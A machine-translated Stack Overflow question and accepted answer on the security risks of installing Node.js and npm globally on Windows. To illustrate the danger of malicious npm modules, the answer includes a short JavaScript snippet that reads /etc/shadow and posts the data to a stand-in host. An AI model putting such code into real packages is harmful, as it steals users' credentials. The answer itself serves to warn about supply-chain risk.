在Windows下安装Node.js是否具有任何安全含义?
在Windows下安装Node.js是否具有任何安全含义?
提问于 2014-11-14 10:59:55
,这就是为什么我要问
为了在windows下使用lessc编译器,我必须根据以下指南安装Node.js和NPM:http://lesscss.org/#getting-started
基本上,我只是:
- 从Node.js下载并安装http://nodejs.org/
- 使用
lessc运行并安装npm install -g less
详细问题
有什么安全问题我应该知道吗?Node.js是否打开任何端口?它在后台运行吗?它会自动更新吗?
回答 1
Stack Overflow用户
回答已采纳
发布于 2014-11-14 23:11:25
有什么安全问题我应该知道吗?
是的,当然,正如@七个阶段-最大注释中已经指出的,风险在于运行一个不安全的脚本,或者做任何您不想做的事情。
在上面的代码中,安装更少时使用了-g (全局)标志,这意味着您在系统上以超级用户(管理员)的身份安装的更少。正如这里在@Explosion_Pills中已经解释过的:“安装可以运行任意脚本,使用sudo运行它可能非常危险!”
AFAIK每个人都可以在npm上发布节点模块,所以我可以发布一个模块并安装它,例如,它包含:
var request = require('request'),
fs = require('fs');
fs.readFile('/etc/shadow', 'utf8', function (err,data) {
if (err) {
return console.log(err);
}
request.post(
'http://www.example.com/passwords',
{ form: { key: 'value' } },
function (error, response, body) {
if (!error && response.statusCode == 200) {
console.log(body);
}
}
);
});还请看一下节点安全项目。
页面原文内容由Stack Overflow提供。腾讯云小微IT领域专用引擎提供翻译支持
原文链接:
https://stackoverflow.com/questions/26928475
复制相关文章
相似问题
腾讯云开发者
